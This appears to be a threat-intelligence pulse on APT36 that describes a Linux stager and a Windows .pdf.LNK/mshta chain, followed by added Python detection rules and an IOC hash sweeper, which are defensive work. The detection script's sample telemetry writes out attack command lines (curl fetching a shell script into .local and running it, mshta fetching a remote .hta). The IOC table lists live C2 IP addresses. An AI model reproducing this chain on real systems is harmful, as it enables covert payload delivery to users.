PULSE DETAIL
APT36 has been observed using two distinct execution chains, one for Linux and one for Windows, both built around malicious files disguised as legitimate documents.
On Linux, the chain begins by creating a `.local` directory with mode 0755, then downloads three files from the same URL: `gkt3.1`, `gkt3.sh`, and `APPL FOR UPDATION.pdf`. Once the downloads finish, `gkt3.sh` is executed; the script then calls `xdg-open` to display the PDF to the victim as the decoy document.
On Windows, APT36 uses a malicious shortcut (LNK file) named `APPL FOR UPDATION OF NAME BASED & OFFICIAL NIC E-MAIL ID.pdf.LNK`. Explorer hides the `.lnk` extension by default, so the file displays as a PDF; opening it runs the shortcut's embedded command through `mshta.exe`, a legitimate, signed Windows binary for running HTML Applications, so the payload executes under a trusted system process.
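The two chains above translate directly into process-telemetry detections. The script below is an added example, not code from the pulse or from any vendor report it cites: it runs three rules over constructed process-start records (hostnames `lx01`, `lx02`, `win01` and the URL `http://staging.example/...` are invented placeholders) and adds a filename check for the `.pdf.LNK` double-extension trick.

```python
"""Detection logic for the two APT36 execution chains described above (added example):
a Linux stager that creates .local, downloads into it and runs a .sh from it (then opens
the decoy PDF with xdg-open), and a Windows shortcut that launches mshta.exe."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-start record, the shape a Sysmon Event ID 1 or auditd execve collector emits."""
    host: str
    os: str        # "linux" or "windows"
    pid: int
    ppid: int
    image: str     # path of the executable
    cmdline: str


SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget"}


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_linux_stager(events):
    """One parent process creates .local, fetches files into it and runs a .sh out of it."""
    per_parent = {}
    for e in events:
        if e.os == "linux":
            per_parent.setdefault((e.host, e.ppid), []).append(e)
    alerts = []
    for (host, ppid), evs in per_parent.items():
        made_dir = any(basename(e.image) == "mkdir" and "/.local" in e.cmdline for e in evs)
        fetched = [e for e in evs if basename(e.image) in DOWNLOADERS and "/.local/" in e.cmdline]
        scripts = [e for e in evs if basename(e.image) in SHELLS and re.search(r"/\.local/\S+\.sh\b", e.cmdline)]
        if made_dir and fetched and scripts:
            alerts.append({"rule": "linux_dotlocal_stager", "host": host, "parent_pid": ppid,
                           "script": scripts[0].cmdline, "downloads": len(fetched)})
    return alerts


def detect_decoy_open(events):
    """xdg-open on a PDF whose parent is a shell running a script out of .local."""
    by_pid = {(e.host, e.pid): e for e in events}
    alerts = []
    for e in events:
        if e.os != "linux" or basename(e.image) != "xdg-open" or not e.cmdline.lower().endswith(".pdf"):
            continue
        parent = by_pid.get((e.host, e.ppid))
        if parent and basename(parent.image) in SHELLS and "/.local/" in parent.cmdline:
            alerts.append({"rule": "linux_decoy_pdf_from_dotlocal", "host": e.host, "pid": e.pid, "cmdline": e.cmdline})
    return alerts


def detect_mshta_from_explorer(events):
    """mshta.exe spawned by explorer.exe: what a double-clicked .pdf.lnk that targets mshta looks like."""
    by_pid = {(e.host, e.pid): e for e in events}
    alerts = []
    for e in events:
        if e.os != "windows" or basename(e.image) != "mshta.exe":
            continue
        parent = by_pid.get((e.host, e.ppid))
        if parent and basename(parent.image) == "explorer.exe":
            alerts.append({"rule": "windows_mshta_from_explorer", "host": e.host, "pid": e.pid, "cmdline": e.cmdline})
    return alerts


DOUBLE_EXT_LNK = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.lnk$", re.IGNORECASE)


def is_double_extension_lnk(filename):
    """True for shortcut names that masquerade as documents, e.g. '... E-MAIL ID.pdf.LNK'."""
    return bool(DOUBLE_EXT_LNK.search(filename))


# Constructed sample telemetry (not real logs): the Linux chain, one benign xdg-open, the Windows chain.
# Hostnames and the staging.example URL are placeholders, not indicators from the pulse.
SAMPLE_EVENTS = [
    ProcEvent("lx01", "linux", 1001, 900, "/usr/bin/mkdir", "mkdir -m 0755 /home/user/.local"),
    ProcEvent("lx01", "linux", 1002, 900, "/usr/bin/curl", "curl -s -o /home/user/.local/gkt3.1 http://staging.example/gkt3.1"),
    ProcEvent("lx01", "linux", 1003, 900, "/usr/bin/curl", "curl -s -o /home/user/.local/gkt3.sh http://staging.example/gkt3.sh"),
    ProcEvent("lx01", "linux", 1004, 900, "/usr/bin/curl", "curl -s -o '/home/user/.local/APPL FOR UPDATION.pdf' http://staging.example/APPL%20FOR%20UPDATION.pdf"),
    ProcEvent("lx01", "linux", 1005, 900, "/bin/bash", "bash /home/user/.local/gkt3.sh"),
    ProcEvent("lx01", "linux", 1006, 1005, "/usr/bin/xdg-open", "xdg-open /home/user/.local/APPL FOR UPDATION.pdf"),
    ProcEvent("lx02", "linux", 2001, 1900, "/usr/bin/xdg-open", "xdg-open /home/user/Downloads/report.pdf"),
    ProcEvent("win01", "windows", 2800, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent("win01", "windows", 3001, 2800, r"C:\Windows\System32\mshta.exe", r'"C:\Windows\System32\mshta.exe" http://staging.example/payload.hta'),
]


def run_all(events):
    return {"linux_stager": detect_linux_stager(events), "decoy_open": detect_decoy_open(events),
            "mshta": detect_mshta_from_explorer(events)}


if __name__ == "__main__":
    for rule, alerts in run_all(SAMPLE_EVENTS).items():
        print(rule, alerts)
```

The Linux rule keys on the parent PID so that a directory creation, the downloads and the script execution are only correlated when one shell issued them; the decoy rule and the mshta rule both walk the parent pointer instead of trusting a name in the command line, which an operator can rename, while the `.pdf.LNK` check is worth running over mail-gateway and download-directory file names where the process tree is not yet available.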
Indicators of Compromise (50)
| TYPE | INDICATOR | DESCRIPTION | CREATED |
|---|---|---|---|
| domain | innlive.in | — | 2025-12-21 |
| CVE | CVE-2025-8088 | — | 2025-12-21 |
| FileHash-MD5 | 1426bdff1ef4466c37631a51c2ba6e48 | — | 2025-12-21 |
| FileHash-MD5 | 180c88e45db8a2bcc095f32ca71ab8f6 | — | 2025-12-21 |
| FileHash-MD5 | 24e010830cbb42384bf609f8acf91c46 | — | 2025-12-21 |
| FileHash-MD5 | 30fda797535a0f367ea2809426760020 | — | 2025-12-21 |
| FileHash-MD5 | 403ea69b8b75e16a644d12053eb2659a | — | 2025-12-21 |
| FileHash-MD5 | 40ef50cc91a890ecb7726a72fe130424 | — | 2025-12-21 |
| FileHash-MD5 | 57ba3d1bfc8724668c52b98908bf159a | — | 2025-12-21 |
| FileHash-MD5 | 5a9552f5d8bb031358cbacf827624186 | — | 2025-12-21 |
| FileHash-MD5 | 689af44a940f293ea659603aee2323b3 | — | 2025-12-21 |
| FileHash-MD5 | 75245a9be77dc6014e079cf249a98ab3 | — | 2025-12-21 |
| FileHash-MD5 | 813b69e1ffeb70cdd5a63a8103a896d3 | MD5 of 6cadcdb2c2cd1425a44fe08e00c4cfcff9498ee0 | 2025-12-21 |
| FileHash-MD5 | 90796ed66e7f5f36b6317e6bdf9718ce | — | 2025-12-21 |
| FileHash-MD5 | a4f1cc3537eb8dd669c3cc16cdf7b798 | — | 2025-12-21 |
| FileHash-MD5 | a53b1134f5bad31b407f5f597fd1cfa3 | — | 2025-12-21 |
| FileHash-MD5 | c345c4a04df2d324f594e2ae9040daf8 | — | 2025-12-21 |
| FileHash-MD5 | ceb715db684199958aa5e6c05dc5c7f0 | — | 2025-12-21 |
| FileHash-MD5 | de035f212161f33accc610793fdcaa67 | MD5 of e0e89ee546fe04498aee0e1deb33e0b47ba8708a | 2025-12-21 |
| FileHash-SHA1 | 149208f87c68cbb540255f9a079426e9d39b1840 | SHA1 of ceb715db684199958aa5e6c05dc5c7f0 | 2025-12-21 |
| FileHash-SHA1 | 1d91fff766d4e86c5bb191d766eeb9257fe1eca5 | SHA1 of 403ea69b8b75e16a644d12053eb2659a | 2025-12-21 |
| FileHash-SHA1 | 23ba373cdfaa29e8fed0d08d20bcda0b9fe86a43 | SHA1 of 24e010830cbb42384bf609f8acf91c46 | 2025-12-21 |
| FileHash-SHA1 | 37611bedc83d02ec020c898f874a8a9c67512b80 | SHA1 of 180c88e45db8a2bcc095f32ca71ab8f6 | 2025-12-21 |
| FileHash-SHA1 | 6cadcdb2c2cd1425a44fe08e00c4cfcff9498ee0 | — | 2025-12-21 |
| FileHash-SHA1 | 7bd6e16e77c4c95a1cb2654bf3270334714fc9a5 | SHA1 of 30fda797535a0f367ea2809426760020 | 2025-12-21 |
| FileHash-SHA1 | 93eb30589e7881dbd9932a171d0406e592af2075 | SHA1 of c345c4a04df2d324f594e2ae9040daf8 | 2025-12-21 |
| FileHash-SHA1 | 9625d4002298ba23506caf0606cb952cc945d3e6 | SHA1 of 40ef50cc91a890ecb7726a72fe130424 | 2025-12-21 |
| FileHash-SHA1 | c0d129b836490e51307cd6e911e559f805dc91ba | SHA1 of 75245a9be77dc6014e079cf249a98ab3 | 2025-12-21 |
| FileHash-SHA1 | da3d3f1af42fe9c54d97218b2a3bd82e7ed045ef | SHA1 of 1426bdff1ef4466c37631a51c2ba6e48 | 2025-12-21 |
| FileHash-SHA1 | e0e89ee546fe04498aee0e1deb33e0b47ba8708a | — | 2025-12-21 |
| FileHash-SHA256 | 06fb22c743fcc949998e280bd5deaf8f80d616b371576b5e11fd5b1d3b23a5f2 | SHA256 of 30fda797535a0f367ea2809426760020 | 2025-12-21 |
| FileHash-SHA256 | 0df9cb5b73822a8a44d0122fad943f376a5e5d7bbb927bc86743dff0379fa3fc | SHA256 of 180c88e45db8a2bcc095f32ca71ab8f6 | 2025-12-21 |
| FileHash-SHA256 | 0f4e3711c8b9ca49584d924f62c6d2e48d88f60583cf3d3db8300d1246bdb2aa | SHA256 of 24e010830cbb42384bf609f8acf91c46 | 2025-12-21 |
| FileHash-SHA256 | 1acc44199d82bc58fb788c4db6f1edd18744060b1e5666023c683c074fd1ebab | SHA256 of 75245a9be77dc6014e079cf249a98ab3 | 2025-12-21 |
| FileHash-SHA256 | 2592a19569dc0635adb175b8e3732b1c0aa43a3055227b10be98760cfbea43fa | SHA256 of 403ea69b8b75e16a644d12053eb2659a | 2025-12-21 |
| FileHash-SHA256 | 4281ce14c506107b645ed84018feee5e59612e7cc8b7b11af2cd6683270b68bf | SHA256 of c345c4a04df2d324f594e2ae9040daf8 | 2025-12-21 |
| FileHash-SHA256 | 4a091d21c18682b1fcb5d9bc097eb57d546be09cdf3594da159c4551cbe7dbe8 | SHA256 of 40ef50cc91a890ecb7726a72fe130424 | 2025-12-21 |
| FileHash-SHA256 | 553d245ae07eb39a9bfec74b64507d66e4aa2817b101fdddbd699dd9a079fa84 | SHA256 of e0e89ee546fe04498aee0e1deb33e0b47ba8708a | 2025-12-21 |
| FileHash-SHA256 | b4c4e5e3d334ca1dc4f64435656f0aa011c8651cd4343707d0397ee9dc6c41e5 | SHA256 of 6cadcdb2c2cd1425a44fe08e00c4cfcff9498ee0 | 2025-12-21 |
| FileHash-SHA256 | c1f3dea00caec58c9e0f990366ff40ae59e93f666f92e1c218c03478bf3abe17 | SHA256 of ceb715db684199958aa5e6c05dc5c7f0 | 2025-12-21 |
| FileHash-SHA256 | d35deed09228159b8f60a0deccf6810ea8214715b305042577c7415563dcd0f3 | SHA256 of 1426bdff1ef4466c37631a51c2ba6e48 | 2025-12-21 |
| URL | http://164.215.103.230:20145 | — | 2025-12-21 |
| URL | http://2.56.10.86:8621 | — | 2025-12-21 |
| URL | http://65.109.190.120:8951 | — | 2025-12-21 |
| URL | http://www.anquanke.com/post/id/269526 | Research reference, not a malicious URL | 2025-12-21 |
| URL | http://www.cyfirma.com/research/apt36-python-based-elf-malware-targeting-indian-government-entities/ | Research reference, not a malicious URL | 2025-12-21 |
| URL | http://www.seqrite.com/blog/umbrella-of-pakistani-threats-converging-tactics-of-cyber-operations-targeting-india/ | Research reference, not a malicious URL | 2025-12-21 |
| URL | https://innlive.in/assets/public/01/app/ | — | 2025-12-21 |
| domain | default.target | systemd target unit name mis-typed as a domain; not a network indicator | 2025-12-21 |
| domain | network.target | systemd target unit name mis-typed as a domain; not a network indicator | 2025-12-21 |
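The FileHash rows above split each sample across up to three rows and tie them together only through the DESCRIPTION column ("SHA1 of <md5>", "MD5 of <sha1>"), so a scanner that matches on a single algorithm will miss a file for which only a different digest was reported. The script below is an added example, not tooling from the pulse: it embeds the 39 hash rows verbatim, resolves the links into one record per file, then hashes files on disk with all three algorithms. The benign sample it writes into a temporary directory is constructed, and the self-test indexes that file's own digests as a hypothetical IOC purely to show the matcher firing.

```python
"""IOC sweep over the FileHash rows of the table above (added example): resolve the
rows into one record per file, then hash files with MD5, SHA1 and SHA256 and match on any."""
import hashlib, os, re, tempfile

IOC_TABLE = """\
| FileHash-MD5 | 1426bdff1ef4466c37631a51c2ba6e48 | — | 2025-12-21 |
| FileHash-MD5 | 180c88e45db8a2bcc095f32ca71ab8f6 | — | 2025-12-21 |
| FileHash-MD5 | 24e010830cbb42384bf609f8acf91c46 | — | 2025-12-21 |
| FileHash-MD5 | 30fda797535a0f367ea2809426760020 | — | 2025-12-21 |
| FileHash-MD5 | 403ea69b8b75e16a644d12053eb2659a | — | 2025-12-21 |
| FileHash-MD5 | 40ef50cc91a890ecb7726a72fe130424 | — | 2025-12-21 |
| FileHash-MD5 | 57ba3d1bfc8724668c52b98908bf159a | — | 2025-12-21 |
| FileHash-MD5 | 5a9552f5d8bb031358cbacf827624186 | — | 2025-12-21 |
| FileHash-MD5 | 689af44a940f293ea659603aee2323b3 | — | 2025-12-21 |
| FileHash-MD5 | 75245a9be77dc6014e079cf249a98ab3 | — | 2025-12-21 |
| FileHash-MD5 | 813b69e1ffeb70cdd5a63a8103a896d3 | MD5 of 6cadcdb2c2cd1425a44fe08e00c4cfcff9498ee0 | 2025-12-21 |
| FileHash-MD5 | 90796ed66e7f5f36b6317e6bdf9718ce | — | 2025-12-21 |
| FileHash-MD5 | a4f1cc3537eb8dd669c3cc16cdf7b798 | — | 2025-12-21 |
| FileHash-MD5 | a53b1134f5bad31b407f5f597fd1cfa3 | — | 2025-12-21 |
| FileHash-MD5 | c345c4a04df2d324f594e2ae9040daf8 | — | 2025-12-21 |
| FileHash-MD5 | ceb715db684199958aa5e6c05dc5c7f0 | — | 2025-12-21 |
| FileHash-MD5 | de035f212161f33accc610793fdcaa67 | MD5 of e0e89ee546fe04498aee0e1deb33e0b47ba8708a | 2025-12-21 |
| FileHash-SHA1 | 149208f87c68cbb540255f9a079426e9d39b1840 | SHA1 of ceb715db684199958aa5e6c05dc5c7f0 | 2025-12-21 |
| FileHash-SHA1 | 1d91fff766d4e86c5bb191d766eeb9257fe1eca5 | SHA1 of 403ea69b8b75e16a644d12053eb2659a | 2025-12-21 |
| FileHash-SHA1 | 23ba373cdfaa29e8fed0d08d20bcda0b9fe86a43 | SHA1 of 24e010830cbb42384bf609f8acf91c46 | 2025-12-21 |
| FileHash-SHA1 | 37611bedc83d02ec020c898f874a8a9c67512b80 | SHA1 of 180c88e45db8a2bcc095f32ca71ab8f6 | 2025-12-21 |
| FileHash-SHA1 | 6cadcdb2c2cd1425a44fe08e00c4cfcff9498ee0 | — | 2025-12-21 |
| FileHash-SHA1 | 7bd6e16e77c4c95a1cb2654bf3270334714fc9a5 | SHA1 of 30fda797535a0f367ea2809426760020 | 2025-12-21 |
| FileHash-SHA1 | 93eb30589e7881dbd9932a171d0406e592af2075 | SHA1 of c345c4a04df2d324f594e2ae9040daf8 | 2025-12-21 |
| FileHash-SHA1 | 9625d4002298ba23506caf0606cb952cc945d3e6 | SHA1 of 40ef50cc91a890ecb7726a72fe130424 | 2025-12-21 |
| FileHash-SHA1 | c0d129b836490e51307cd6e911e559f805dc91ba | SHA1 of 75245a9be77dc6014e079cf249a98ab3 | 2025-12-21 |
| FileHash-SHA1 | da3d3f1af42fe9c54d97218b2a3bd82e7ed045ef | SHA1 of 1426bdff1ef4466c37631a51c2ba6e48 | 2025-12-21 |
| FileHash-SHA1 | e0e89ee546fe04498aee0e1deb33e0b47ba8708a | — | 2025-12-21 |
| FileHash-SHA256 | 06fb22c743fcc949998e280bd5deaf8f80d616b371576b5e11fd5b1d3b23a5f2 | SHA256 of 30fda797535a0f367ea2809426760020 | 2025-12-21 |
| FileHash-SHA256 | 0df9cb5b73822a8a44d0122fad943f376a5e5d7bbb927bc86743dff0379fa3fc | SHA256 of 180c88e45db8a2bcc095f32ca71ab8f6 | 2025-12-21 |
| FileHash-SHA256 | 0f4e3711c8b9ca49584d924f62c6d2e48d88f60583cf3d3db8300d1246bdb2aa | SHA256 of 24e010830cbb42384bf609f8acf91c46 | 2025-12-21 |
| FileHash-SHA256 | 1acc44199d82bc58fb788c4db6f1edd18744060b1e5666023c683c074fd1ebab | SHA256 of 75245a9be77dc6014e079cf249a98ab3 | 2025-12-21 |
| FileHash-SHA256 | 2592a19569dc0635adb175b8e3732b1c0aa43a3055227b10be98760cfbea43fa | SHA256 of 403ea69b8b75e16a644d12053eb2659a | 2025-12-21 |
| FileHash-SHA256 | 4281ce14c506107b645ed84018feee5e59612e7cc8b7b11af2cd6683270b68bf | SHA256 of c345c4a04df2d324f594e2ae9040daf8 | 2025-12-21 |
| FileHash-SHA256 | 4a091d21c18682b1fcb5d9bc097eb57d546be09cdf3594da159c4551cbe7dbe8 | SHA256 of 40ef50cc91a890ecb7726a72fe130424 | 2025-12-21 |
| FileHash-SHA256 | 553d245ae07eb39a9bfec74b64507d66e4aa2817b101fdddbd699dd9a079fa84 | SHA256 of e0e89ee546fe04498aee0e1deb33e0b47ba8708a | 2025-12-21 |
| FileHash-SHA256 | b4c4e5e3d334ca1dc4f64435656f0aa011c8651cd4343707d0397ee9dc6c41e5 | SHA256 of 6cadcdb2c2cd1425a44fe08e00c4cfcff9498ee0 | 2025-12-21 |
| FileHash-SHA256 | c1f3dea00caec58c9e0f990366ff40ae59e93f666f92e1c218c03478bf3abe17 | SHA256 of ceb715db684199958aa5e6c05dc5c7f0 | 2025-12-21 |
| FileHash-SHA256 | d35deed09228159b8f60a0deccf6810ea8214715b305042577c7415563dcd0f3 | SHA256 of 1426bdff1ef4466c37631a51c2ba6e48 | 2025-12-21 |
"""
ROW_RE = re.compile(r"^\|\s*FileHash-(?:MD5|SHA1|SHA256)\s*\|\s*([0-9a-fA-F]+)\s*\|\s*([^|]*?)\s*\|")
LINK_RE = re.compile(r"^(?:MD5|SHA1|SHA256) of ([0-9a-fA-F]+)$")
ALGO_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}  # hex digest length identifies the algorithm

def parse_hash_rows(table):
    """Return one {algo: hexdigest} record per file, merging rows the descriptions link."""
    group_of = {}  # hexdigest -> the shared record dict it belongs to
    for line in table.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        linked = LINK_RE.match(m.group(2))
        members = [m.group(1).lower()] + ([linked.group(1).lower()] if linked else [])
        seen = [group_of[h] for h in members if h in group_of]
        rec = seen[0] if seen else {}
        for other in seen[1:]:  # a link may join two records that were seen separately
            rec.update(other)
            group_of.update({h: rec for h in other.values()})
        for h in members:
            rec[ALGO_BY_LEN[len(h)]] = h
            group_of[h] = rec
    return list({id(r): r for r in group_of.values()}.values())

def build_index(records):
    """Map every known digest to its record so a file matches on whichever algorithm was reported."""
    return {h: rec for rec in records for h in rec.values()}

def hash_file(path):
    """MD5, SHA1 and SHA256 of a file in a single pass (usedforsecurity=False keeps MD5 usable under FIPS)."""
    hashes = {a: hashlib.new(a, usedforsecurity=False) for a in ("md5", "sha1", "sha256")}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            for h in hashes.values():
                h.update(chunk)
    return {a: h.hexdigest() for a, h in hashes.items()}

def sweep(root, index):
    """Walk `root`; report each file whose MD5, SHA1 or SHA256 appears in `index`."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            for algo, digest in hash_file(path).items():
                if digest in index:
                    hits.append({"path": path, "matched_on": algo, "record": index[digest]})
                    break
    return hits

def demo():
    """Sweep a temp dir holding one constructed benign file (no hit against the pulse IOCs),
    then index that file's own digests as a hypothetical IOC to show the matcher firing."""
    records = parse_hash_rows(IOC_TABLE)
    index = build_index(records)
    with tempfile.TemporaryDirectory() as root:
        sample = os.path.join(root, "constructed-benign.bin")
        with open(sample, "wb") as fh:
            fh.write(b"constructed sample bytes, not malware\n")
        benign_hits = sweep(root, index)
        self_hits = sweep(root, build_index([hash_file(sample)]))
    return {"files_known": len(records), "complete_triplets": sum(len(r) == 3 for r in records),
            "hits_on_benign": len(benign_hits), "selftest_matched_on": self_hits[0]["matched_on"]}

if __name__ == "__main__":
    print(demo())
```

Resolving the links yields 17 distinct files, 11 of which have all three digests and 6 of which are known only by MD5; point `sweep()` at a download directory, a mail spool or a mounted image, and extend `IOC_TABLE` by pasting further rows in the same format.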
References (1)